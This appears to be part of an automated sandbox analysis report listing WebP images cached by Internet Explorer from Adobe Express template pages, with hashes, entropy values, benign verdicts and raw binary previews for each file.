                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:96:9XAfH5s4jrO6NqHxGk9gdymKSznfXHvcNk9zbuO1Hc8C6JDGT0czTPKhb/qqvXT4:9wfZs4f7WgdrLoIzKO17rFczTKpiFIO
                                                                                                                                                                                                                                                        MD5:98D84D379B085C1A12991B52C780B977
                                                                                                                                                                                                                                                        SHA1:C4E555CF3F6C9D88D5DA54F5FAAD6B83E11B07B5
                                                                                                                                                                                                                                                        SHA-256:838FB7F888311DD318D82F8E101B1431A705CF3255F94B54812353CE9349E470
                                                                                                                                                                                                                                                        SHA-512:3E12F700C4DF5A4C35352F8645EBA930096D1FA2F52FC3C4E51F9212AAC5FDC43D497F663733B441C6D25EA58409F14D2B44DCC522DF12D3101E9FC3769AA078
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://www.adobe.com/express/discover/templates/media_1942b8dfa3fbbe527b5be1e94d82f53fbea6204dc.png?width=2000&format=webply&optimize=medium
                                                                                                                                                                                                                                                        Preview: RIFF....WEBPVP8 .....}...*,...>u6.I$...#.....in.o..aWr..&........?...?........g..A....s.I._.b~........'..|..{...q. _.. .....7.C:...w......>.].....?.~.>..g.G.o............g.o...?._........7........A.........O._......H.....o.?.~.?6...K.O...'.....?.................o..i.a.*)\.yp....9...{.n]...w>[.<..@l..=.^..X.0.*>.....^.~=0 .0.m......z.....u....q.%...=.'.....TE.78...F?_..i.........g...T,e`9........h@..E;.+..cm.J..9..7]#.n..}.8l.)u.'K...........X...p..s....++..f.iC..P.O....MyT.~E..)../0...]_Bv.0....}Q...#.@..._i....+..cm.Nh.X.....Q$.{.'.@3V...B.O....I.0....<..T.<..._XL...Z,.f.....X.*..|^.p...........O.J~e....z.]..=eK1...~m.@Gt..G"..^.......;...)...-j..Zb......i*...........Ha.;l..x.K.l..a...@]I"....I..L..R......`<......B.K$...W..O...u.m...7..W.P...G.D).7..u..U.S..m......d....J.Q.6D...k......~.T.%.h/..E. .....Q.r....u.G.fG``.o..B..r>.._.OQ0ML.6&.S.9.2A...;..(.9u...h.z..wY...3nru.V.jP`.#^........Q...o:3..0.1..7...s..sZ....x..5....;v......1>..3nA....(L...
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\media_1bb9f1a0edf3462d9562f6f244d0f5b6384f6f52e[1].png
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:[none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):8786
                                                                                                                                                                                                                                                        Entropy (8bit):7.978225277587147
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:192:zgygzm1xjHeEVrYTjck6lu2IgLOWn4FfjjNfHykTWpNiGPVUYsQz0qcW9mqg:U7m1xiEujckgptnKjjtyDdPGM4fWAz
                                                                                                                                                                                                                                                        MD5:F60ECBFD066BE3BE2EE79EF270D558C3
                                                                                                                                                                                                                                                        SHA1:DAF9A9B6E6BBA2EAC80B93EE28F4BF99858C958D
                                                                                                                                                                                                                                                        SHA-256:67087996A52DC621CAB6B7699C79121BCCE99C01641D906375D632F681F79583
                                                                                                                                                                                                                                                        SHA-512:3763E7B87E4799958CDC0D13087A3588C0CDD661FCE54CD59E8E74CF01EE68E3C94A6A65E0F45D7355341A82B578E0CA37E6C9622D73A55E5FFA025B0836FA28
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://www.adobe.com/express/discover/templates/media_1bb9f1a0edf3462d9562f6f244d0f5b6384f6f52e.png?width=2000&format=webply&optimize=medium
                                                                                                                                                                                                                                                        Preview: RIFFJ"..WEBPVP8 >"..p....*,...>u8.I$."!$V.H...gn.6yq......^Z...........z1...G.g.....T...=.<.}`?.d..'.oj_.|+....p?...d...E.Q...?.=.~........z.~A.....o\_..x.<..S.......y.....W....q.`........w.O.?......6.../..._.O............_.>....n....................[........,..691..0..F..V..v=......^...h.n......}V....a(...0.......>~.m.MIF..8.y.<.+9.<.._.#r.....5..{r.*.t,..r|..U...w.}s?N\......G..;N..<.0.Z..P.F......&F.g).$ rb+.j`.u.a..G..C9s..>..i..[.\..g.........d?8....1.v...r.r.t|.............J.$..N..U....#.3..ks...|n.jj5.[9.~{..Hs7..A.R....M.y.J.$.!3..2.......l.j..."c...?..g...MM.`.\..-..._.j..8I...<..DJ...g....s..L.h.3x.H<<...D....{.n.;7.3......V..F..K5."2<..r.4..K|=...:..".{.sM..Y/f...n......h..kV[.[.V...]=.....B.......LQ...&.....<~5...#./.l#.f.X....:_H(..X4..`..h.6.rB]..B.u~..Q...?).........y.....s..........zD.-..8.B../...?`...k&..j..JM.Y_..^...=...K{s...U.h........h.xZ.A.MI...!..d.........U.t....N.......#...<L* ...<....WN..<.9.....%.Z........U...EyqK..Sg...
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\media_1c49f1e6fe15805a0bcb06e3f3bd77ace97c16f0f[1].png
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:[none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):14006
                                                                                                                                                                                                                                                        Entropy (8bit):7.986302776589774
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:384:5SE0hVnoRDHH6GyjKwDatW1AAKZveVth5An:kEZRrNrlo19KMVthun
                                                                                                                                                                                                                                                        MD5:4470ED0D4F06EEE579251F03C19CA644
                                                                                                                                                                                                                                                        SHA1:4012B65018697A5BCB74366CA018E2D4EA49A297
                                                                                                                                                                                                                                                        SHA-256:8E36339D3C5DAC82836A617CAE7AD7BA04919D73C5B32584FB48A2380423E6BF
                                                                                                                                                                                                                                                        SHA-512:2E4047689AD5DDE587DD7A226E78445DC48555F568B1D5E39F5D9F88FBAF3C2733331AB09A0E6A8BBD513929F6BF0EB0FE70647DC86079D2AAAD2F6B1CEA85BC
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://www.adobe.com/express/discover/templates/media_1c49f1e6fe15805a0bcb06e3f3bd77ace97c16f0f.png?width=2000&format=webply&optimize=medium
                                                                                                                                                                                                                                                        Preview: RIFF.6..WEBPVP8 .6..0....*..k.>u6.H$."!'6.h...in....@l....................?x.....Q.....~M:.........[.../.......l...w.W....v.....W.g.7.O......../..?........~p........../....9.......O..........e.k.....?..M.....Y...........y...O....?.......~..l?...6./.........3...0..CF..O2.....I..D;.N.V.y...r.S..5....9. W....C.!`..... .=u`. %..S#*.O{.....&...Z..70.+..wR.?_.=.o..)......F}..%n..jI..6t3)...RPm..........R*v&......8.....Y2.{........S%c.u..)%...../.P"...[.....)4.."K..`N8....y..Z2/...pZ.S...$..l..nU.5d.< ..)@...tQ.......C..u......_#.......]5.....<...Z..........Y.p..7N.{.....9=F.. <.g..=gq`...ES.F.>....?r....<sn..V..t`Tm+.[.ft....>.Z^j).-k....Y..$..\...'..O..=.,.......6.8.Jj'E?..0H........n.}.*g.I...s....y..s..7..v..L+....I...j.|1..(....@..... a..'&A.3_..y._.7.:...d..........:.HH/i.p...h3vY.z..<.^........H..P.r.H..4...v7..C._.`.]....$x..j.\.|.,....D......9..z..-.O..e.J.x.7.....|.....OX...kd@.._..\..s.<}#...)=-..o.}.-.4...w}..y.......H^.... ..
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\media_1cc107ba3f6747d506e66e78ba351a10e1ea52e50[1].png
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:[none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):6864
                                                                                                                                                                                                                                                        Entropy (8bit):7.968118033069679
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:96:0lfvhVkG8uHpBvCsRHmETSv2vA0D/0WY/2X6iwM2gMLsl74OC8NpVdZc0hg:8vrkGJBnG7mtDch2qilhMoRC8N5W
                                                                                                                                                                                                                                                        MD5:FFB2F4DCD04A384C98B2BFFA0800EF35
                                                                                                                                                                                                                                                        SHA1:DE082F25370B4BD789E739B1B38299FFA45EA17D
                                                                                                                                                                                                                                                        SHA-256:AB9842D8F4FB826A1D6BDEC61315B0614F0B274F12EE41BBBB9F5FC1FB86B985
                                                                                                                                                                                                                                                        SHA-512:715A14D5BD6849409804275E9879609C1135B7A47CA73A0051D1FA44981BBEAF38C6935B65DE2B21B07BDF0A834C767162E4DD732AE1A812C8BDCDA00C019561
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://www.adobe.com/express/discover/templates/media_1cc107ba3f6747d506e66e78ba351a10e1ea52e50.png?width=2000&format=webply&optimize=medium
                                                                                                                                                                                                                                                        Preview: RIFF....WEBPVP8 .....x...*,...>u8.I$."."V.X...gn.[.7.3(/..Ig(z/..=.7..........(.l.s...7...(./..]....u.g...c.....<..3........r.C.I.y.{.._.?..M?..#...p.....z....o.........e..........................s............/...c....)6.....!.j{b`R....,k......z0..|...QyO....HT.....3...1V.ets....1.e{.5.?l.}!....X.Es./.9H.=[.s.....,.I.qAw..S..es.P..DH....].{..(...Q....>..F....!.).p.:.......!..]....`m.....*....Y3..VP....\.S.l.'e9V..l/...H.h.T%..$.7...@..w..|......L.Wg...k...D..Gm...A.:..K?..V0W...N.....Sn...8.T..?.@.y+.=...J....P.<NoU...A3S(...Y...H...q;t...7lT'.}.at.T7I=.}.....h...u.....#.? .`...[.m...\....R.Gkk...^W.y....jO....\._....4.2(}......!A..c......O.?.}:...9..<5.QCm.u.S..Z.Dt.....q...........Z....O.."t).m....'........;.l..}.;fE...u....|.Ig..6.A..e......~..A.).`m..5.q..._.M.:z~.y9i2"..S.c...c.".S../.....H.S7.?R..}...~t..;..<....6....].Fue8....kq...@.....|bt9bM..)6....%.4.d........S...U2..b{.CrO.c......f~..'.3.B.........(s.....?
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\media_1cdeb1f9cb9561fe82bc565c32db4b1b730dbfe10[1].png
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:[none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):4804
                                                                                                                                                                                                                                                        Entropy (8bit):7.958210671589333
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:96:fq1KwVvXnnyTdRmYbx5PP13QDu9glSCRM3EYQCdYA7Tcf:SwwVv3Wdhx5X13/OvRudYQTcf
                                                                                                                                                                                                                                                        MD5:73BD29F0E29083B2F40BD79BBEA99AFE
                                                                                                                                                                                                                                                        SHA1:685A38B5D01C1A5E53B21C166964AB86284F27C4
                                                                                                                                                                                                                                                        SHA-256:BF6BF34BC41671E0CF04AC6E3611CB2B781B12184CB694BDE2B8E8494FE6D165
                                                                                                                                                                                                                                                        SHA-512:F8A364D8A37D9E36545883896E3FF9AD0B9F96466F3B96200C38BAB605F443A9C740A0154FC9F6567706E257B626CBB2792BC5595BFC58C23D39EF84DE65734E
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://www.adobe.com/express/discover/templates/media_1cdeb1f9cb9561fe82bc565c32db4b1b730dbfe10.png?width=2000&format=webply&optimize=medium
                                                                                                                                                                                                                                                        Preview: RIFF....WEBPVP8 ....P`...*,...>u6.I$..!$......in.t....o.^....j..g.<x...]..B.g...|....W..`/.....E.?...z......<e........}....;.o.....?....{.....W...?.+>..........w...?......u.................E..}..d..p...ZC(.O...hO.q~....vp.Q.....2.!......Q...gLE.o.$....K.....!.......EOf..u..< <...X...L.y.]..-4^x.s....X8....k...F1u^.f..>z..0/...)!h.QL...]B..Fo....c..\*..C..Y.U..ef.......o.zT..w&.Y(@R..p...^.......;..<jB\..WO...<....&-...G&..6F?.p..]1....2.{...^P...[...Y../@.F6....I../..c.c..V..D...2.w...]2.d8V..e.BIx.\Q...; .6.M....H._....Vv.LG......).+.x......e..cZ..0\..Ol....&.`).ac..V0L...@Fp...c.X..l.f..G..e...G..J.j..c....N..6.w\ ..%.B..(..P.......A.y...tZ.de.@....S.mN..-u...!..i......6.gzXf.p..\........).;!...{e.k.....,mD.(..QS....EO...u.>b..9m..S vC....o........b.W..}S..t.z.v.c..87V.zrq.....L.&1...s..l8..2.&...p....I..x..'g..FdM.q.K..g.U.1.YM4.(+..5..1.-.f..s..^.g..+........6`.9K..@............Z.~..8...Si.*\..V.sb.+;.xV....R.S.$<..]g...u....J.*(g}
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\media_1d19f92a3efdead52618f4707fa8f2fc6b2fca809[1].png
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:[none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):10398
                                                                                                                                                                                                                                                        Entropy (8bit):7.978687559230178
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:192:EMFszDQpWpGdsk2Jtyj5vZFbv+BmeLXo+KFQZtKMLs5wDN2e2h6KgWmMs2oeM9Y:EMWz8pjskEgFvDvaNfsODr2cnWmMs2MK
                                                                                                                                                                                                                                                        MD5:A15D253E770CCB02D8C13B28AA439E62
                                                                                                                                                                                                                                                        SHA1:58C054F4D73CBAB8A81B53C9DD29C7BF52880691
                                                                                                                                                                                                                                                        SHA-256:CCFEE07EA88461FC51CE8EFF947B500304C707EC38C45DA1F595E9C283B2A682
                                                                                                                                                                                                                                                        SHA-512:502B74C6656041E48E628DB219C11F695A34479792947E3B83599CE2860469FA839FCE9A474BCF241C20E68CE58E2B93DF0939826F55D2E891A72C11CE39FE07
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://www.adobe.com/express/discover/templates/media_1d19f92a3efdead52618f4707fa8f2fc6b2fca809.png?width=2000&format=webply&optimize=medium
                                                                                                                                                                                                                                                        Preview: RIFF.(..WEBPVP8 .(..p....*,...>u4.I$...#.....gn.%.\..h.9/.w...C...rS......D.f....7..P..?.......o..\............3./.~...?........_..Y...w..R:.....i.Q...O._......g./... ...&.S.....{ ...~...}O.....~E.......?.?.......O......?......k..._.o.......t.;.1.........}+~..G._.._.......C.........s..o..EA0R..a^...~.n|.......^.)...U...}6...{......./...V=.Zhb.)....s...[.I.x.:.+a.s...$..Ho].J.....+I.C^....!6.c..[ ...cq..:..+h..RE^.t../.@D.g....M..o.....N Z&..Q~..Lr..o4Or..H..,m.ui...[..t...L;...'.^..VL...\C8S(B....cb&.)Q..........<1.d.4..W.L..Y.#(.$.V.o.u...t&...hHP......o..%.._........4V.M.W.e.....H...hQ..................wN...!.e1iL...2I;..t>..*.H!xe.b%...[.&......r].{....A.yJT.9"nju.$C.*..]I..>.~..S.~....DK...$..j....w..0.;.*........w.#.{..&.6...<&...5.H....7..|.J|..x.s...^..."....."..>.....V..6....U.XON..o....P...M>.....qi)$JR.A).@...y2..i..`.e.._.t?y.x..5...`..C.N.'....).2.Q....X...s./.F..y.*]].z..\..V..2....Y...7.G......Wv.M%n>......W.`..}{S0.
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\media_1d1cd9f4f52ee7cd0886e8fde08f4157e1756841e[1].png
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:[none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):15102
                                                                                                                                                                                                                                                        Entropy (8bit):7.985800241575201
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:384:B5JhElyFrcMAo1GJot1gchE1hDo8XOef0pEKzIhr0:BDhElyFrcBo1vgFRvzfWTcr0
                                                                                                                                                                                                                                                        MD5:9BE513D1D1EF7881B749103564658A38
                                                                                                                                                                                                                                                        SHA1:69DEC5AC6B1DB57E6C7979FF771391E13BB689D8
                                                                                                                                                                                                                                                        SHA-256:C46F2D8C9678C20CDD1456A671ECC328B88B4140F4FF5F30788E4DFF4E681867
                                                                                                                                                                                                                                                        SHA-512:6E59069EBC74B2152467F14E7339820F6F430882F922C3490F414408215B42CCA07CD2D81918FE8310116FB1A8B760AFFFAF73CCEC8335CD0D5B9CB72D0BFE81
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://www.adobe.com/express/discover/templates/media_1d1cd9f4f52ee7cd0886e8fde08f4157e1756841e.png?width=2000&format=webply&optimize=medium
                                                                                                                                                                                                                                                        Preview: RIFF.:..WEBPVP8 .:.......*..k.>u2.H$..!'..@...gn...g.m./.?-.g.~T.*...?>..?.z..........G....7..S>._...O.e.u.w.<5...t~/.B.e..z.......~..f}.._.?...~3...+......?....l}o}.m.......?......7..._.?.z..O.....?.~....[.i...o.W...g<.>..............?n..............n.........w.+.G...?......].....'....u..o.&.vB.B..|m.2....f`."o.K..^.....1c.......c.1.El...._h.=Y....Cw............z.UV:in*.N...[,M..#....:W...#`y..t#tGs.^%....=x.Q.b...e.cA.. .kn.2".l...m..0.Y.vc...-y..k..T..T..(..d.@`...Hj..{r.d...1.=.e.l.Z...hA..y.&...a..-..b...u..C. R.{+aZ....y$...}.>.....HFZ.)..}s5......G.r.....A-..W,.l..'...@EB.{....Y?.*.&..A-?...mS......Cx..W.u..7Z5}.oB.]...G.....c(....I.%....@4o../........r.5.....V.qw...n.>\'X..........i..S..E3.....&.&.U......O8+.....Y.(.$..6../(....$/.GS=K..K{&?../.Z.6|tZ..Ls..oh.)..5Y..N........g"...~$.S.I.....J.\,...3..p.=&.........8.....Z.<.-Q.c3=f.j.<.`..1.....0.o$..?L.b.}......X......^.9&U..B..l..k.*r..k/....w4.{Xba.F&)~...z........,gbt.u#..[&...v<.
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\media_1da184d25b31249c37bc324022a8a9b7cac374412[1].png
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:[none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):10334
                                                                                                                                                                                                                                                        Entropy (8bit):7.982111951615871
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:192:0uCoZup8Xzf1hkYaqi9gc/GLdjX5ZYYArJpAP2WRhcfN8y/kwEuhYyL:vU8jfTaU5AYGjmcDfhYyL
                                                                                                                                                                                                                                                        MD5:59C331BFBAD3C2EF6B45378D2DBB9388
                                                                                                                                                                                                                                                        SHA1:E014312EA61EF95CC7DF1867B324A9253509762F
                                                                                                                                                                                                                                                        SHA-256:B67B9473503BBD8CB7B06C9B54F315E99EFB8D15312B05E699B5C9B56D2C85DE
                                                                                                                                                                                                                                                        SHA-512:B1D4B34BDB2684A375AAAE347016E82238467C5B4BE8AF104C32DE850260B5491360E4281F8AF3E5AACC1ADEA4F0A1B87DC83C74323338242AFFD19D037535D8
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://www.adobe.com/express/discover/templates/media_1da184d25b31249c37bc324022a8a9b7cac374412.png?width=2000&format=webply&optimize=medium
                                                                                                                                                                                                                                                        Preview: RIFFV(..WEBPVP8 J(..0....*,...>u8.H.."!#4{`...in.|....g^?.?........M.....>I...O....Y..W..C..}.....4...}.?.o....g...c./...H{......~.^....O............_.O....?..x.....o..G.T.......O.............J./.?.o.....:......................'.........2.L..P...Y...\A.....n.O.dO..v....g.u.+....\.x.|.@P?..mzm\.yr.,^.#{.8..]..x. .....,.2SoW..p3....Z........{.>.uJt....R..,89x.r.w9.,......]...?A(.!.DZ.c...*,M.,x..O../.....uED..H....b..6..!..&1..m=.q7..}.OU...>0O~5.bA'p....b..f..:.5Km..g......{.h...s..0....?.2.......#'.31..N.$........t.s....=(.Q.......M..ko...!.......<T@y.qC!..Kj......AF.....i2...T.(T!'..Kn..{.D`..G[3..=.yNU.J.\..v.......{.m...b.Y....R.].".u1y}...KC.W...^\...."...b..Dt......n.(....U....<..GN}.....Y....@..BO.:....y.x...U`.V`....&Z....[_...P..u.p...j.............r/YG#..%5.....P.{..R.R_T..R1...WG.BdM...2..2a..].......m.+..Y.y{.@HV.........L...#.1..O.r.%.Z......2 .>..)..p>...o..6..~'.pZ..o...6...,9..s[.qq$z..o...dR....../.s..O...".0.j3:.=...NJ?}
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\media_1e39ae16b1cc3a98c149baa1ec6e5f9ddd9d80afd[1].png
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:[none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):14708
                                                                                                                                                                                                                                                        Entropy (8bit):7.98564286184386
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:384:1rz9NMFSYFsRx7paN4ldPDfEQJNw9HxHqfgc:1f9oSOMxU2nDfEo29HxHqIc
                                                                                                                                                                                                                                                        MD5:CA1DFBBF3AC421BF0E616E2BDB333394
                                                                                                                                                                                                                                                        SHA1:D1FC80B6E0E86509D6F73545F2681667E87DEAC2
                                                                                                                                                                                                                                                        SHA-256:DD6BE9B00F425848C5EE792C9082E459A6F01365CFB23226E67876E05AD341E2
                                                                                                                                                                                                                                                        SHA-512:7AEE6C32DE47F64849E04AD8F60D9A9B40A834F69CA2D035D074690F9888A8CB5534641CB6865EC06C82CBE612E5944CB583ECCAF130821F4666E257BF8102CE
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://www.adobe.com/express/discover/templates/media_1e39ae16b1cc3a98c149baa1ec6e5f9ddd9d80afd.png?width=2000&format=webply&optimize=medium
                                                                                                                                                                                                                                                        Preview: RIFFl9..WEBPVP8 `9......*..k.>u4.G..$.'......gn.=....+X..`.A...~ <.\.L..._Q.T}.|......y.c...g..[/ToB....?..|..C...|.n...=....4...g./..h...k..g.%...K./.?......z.O.7..u_ .........O._...M....OP_U.]..._.O.?........g.?...~t.....A.......O.............&.............'._.......-.....?....r...{.....O._..`.........g........o.~.?....w.O..x......fj...?_g....b.#...=.Ht.Pa...;2.[.. P...s.$H....5....Og\qA..n$.c.[0!...5$..<*11.....l..........SI.......)f.^cv........V.7..-.%.'i"......t.]~Q.Uu9.9..Q...NH?..`...$'...83OsS....f'..l.%?.Hg.q.....t ..;.h7~..."4.%,.#|]./....<9............g.......I.....8........p.3\t}^......:,...R............^....\.NJGO.A]......3.z.&..(.Cr.....X... .X....._..&.G>...t.&.........!l..2.2.5..E..).{._{.......h....lP.vV.?.D$Y...Uv....dh....z/...X.!u....q.6.-.s.e.{,Y..F.p..P.9i^y.F.A.....Xx.K..e...;..J......gB.........#;=c..Ga..(!..hH..4....I........1u.........:UG.....|.D..V.d..D...<T...~.....{....]2.c.ln...:C.y%..C.B..NYA...iG.;..#...9.....s1M.....#...X
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\media_1f32be53e4c9aae4eb853ad4ef058c861bf97a4d6[1].png
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:[none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):11276
                                                                                                                                                                                                                                                        Entropy (8bit):7.9790117603386275
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:192:2OTQJTnQ9n/BDxo9OwZHYe0AlL0H//BMf0FjyaOUW1Vx36FhfFEzsFhUxLAZKpQn:pQTnQ9nvKO+Yex2Mf0xaVxKF1Kyg8ZKC
                                                                                                                                                                                                                                                        MD5:977D1B0648E51CF1E42BC2C3925CB52E
                                                                                                                                                                                                                                                        SHA1:351AF416E28BF5BC432716AE38A29E3D0A9D016C
                                                                                                                                                                                                                                                        SHA-256:CC05CF404512736230739038981A9FA6D987AAC4C5A71EDA0C0852236CEA96FA
                                                                                                                                                                                                                                                        SHA-512:7A2510489FCBC36F397AF94FEF0D25395F5EB64C5C7AC4D49AAE97BA181ABB2F3D8AF501A91B27D7ED34A31764DB7A7C1FA223681ACE26ACDECDA8686556A2AF
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://www.adobe.com/express/discover/templates/media_1f32be53e4c9aae4eb853ad4ef058c861bf97a4d6.png?width=2000&format=webply&optimize=medium
                                                                                                                                                                                                                                                        Preview: RIFF.,..WEBPVP8 .+..p....*..k.>u6.H$."!&......in.B....9..Q...<...K.....}'..._..#x?......z.A.......t.....Oy.....?...z.......?R...........o..{.t....^....g....f.........g.?.~................_...y.}....O...o..?........k.o...<....[.?.... ..?....%.................2...X..}].cZY.!...f9.b..e......l....G+..F....c..55.r.U.<.D.yy....N.^....Lv..h..........,.7W.....).d)Pf.0(.......4.....S..|hF..Q..+.m..Z.Z...w 5.M.....ZM'..i.{.o..O..c.....*...8..MBt.`k..E..Y..Jl)y.."..a"E.b.>...}c....R.D......^....w....\rpDd...f+...~....^'f.$c&..%5.....).h.:..b"...A.......q..:.50....d..i3.....[..:.j0...V.w..#..X.v.z...l....a.m.y...GZ.;..(...V.........}..t,......H8...g6..h..W^.".........^.0..4.7r...|......L.....\...%.Qv.nl1..b9K.y0idg..^..U..h.Y...?...|.w.%..GW>....,..$E..$p.R.....5.o.?....1.Hq.'.C.fE.i...zNc.\p......co.Ee...n.R3:F./.P....do......U,...t..i.AZIP#.#..T..p..#.>....`9...#..d./vM[..EE..t.9Dm).@........oj..j.8ZU."..M8.2.yj...>ix....d2...%....?1..O...Bf.?..Z.}
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\media_1f993e61cdb66f59a3b561bdd8a7b091beb456077[1].jpeg
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:[none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):16002
                                                                                                                                                                                                                                                        Entropy (8bit):7.928728831229961
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:384:Neh77iQyXjSlY91RnYf0GbUa5qHY8ZyRj9ZcPDE:N07RyzSi9bnFGUa5qtyJcPo
                                                                                                                                                                                                                                                        MD5:C25BC4B7112ABDFE0229568AF11B5285
                                                                                                                                                                                                                                                        SHA1:E6A28D126F750643EBD5152F7B22ED6B1C345F54
                                                                                                                                                                                                                                                        SHA-256:98F95E3A1348C2104A63C06E27EF45218FC47A5B4E59BA2F5F47875B8E438133
                                                                                                                                                                                                                                                        SHA-512:74A8BB611D1863003672BC419CA367FC9559077907ABD5AE214274830930622BB2147F5D268A49E7452239FF4B41595D9C0FA5490C776404A43C47047D18199C
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview: RIFF.X..WEBPVP8 .X...b...*....>u:.J$.""!R8....im.21...]....... .....}x.......;.......9...9wn....y......[./.e......o.......y.5.BJ..^u....B.c....z..........9.S..p}^..z.y.z....4.K.S....}...../.K...{^.#....A}m...].K............._....../`.............7..$?........\.....5i...,.v...O..l;MZj...6...5S...V...B.i.MT..f...|P.a.j.U>(Y..5i...,.v...O..l;MZj...6...5S...V...B.i.MT..f...|P.a.j.U>(Y..5i...,.v...O..l;MZj...6...5S...V...B.i.MT..f...|P.a.j.U>(Y..5i...,.v...O..l;MZj...6...5S...V...B.i.MT..f...|P.a.j.U>(Y..5i...,.v...O..l;MZj...6...5S...V...B.i.MT..f...|P.a.j.U>(Y..5i...,.v...O..l;MZj...6...5S...V...B.i.MT..f...|P.a.j.U>(Y..5i...,.v...O..l;MZj..1..R.y3u..-..3.T..i.MT..f...|P.a.j.U>&._..A.M.A..s..|.@..qJ...5i...,.v...O..l;MZj..W...R...U........]..Gv.|P.a.j.U>(Y..5i...,.v........8..u)E.s...I4.......(Y..5i...,.v...O..l;MZj.......5.N._...u...Dp..x..%..fb=+....|P.a.j.U>(Y..5i...,.q.@ .?..%.|..:.|J.......V...B.i.MT..f...|P.V.@..t*B...{.]....].
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\onz5gap[1].js
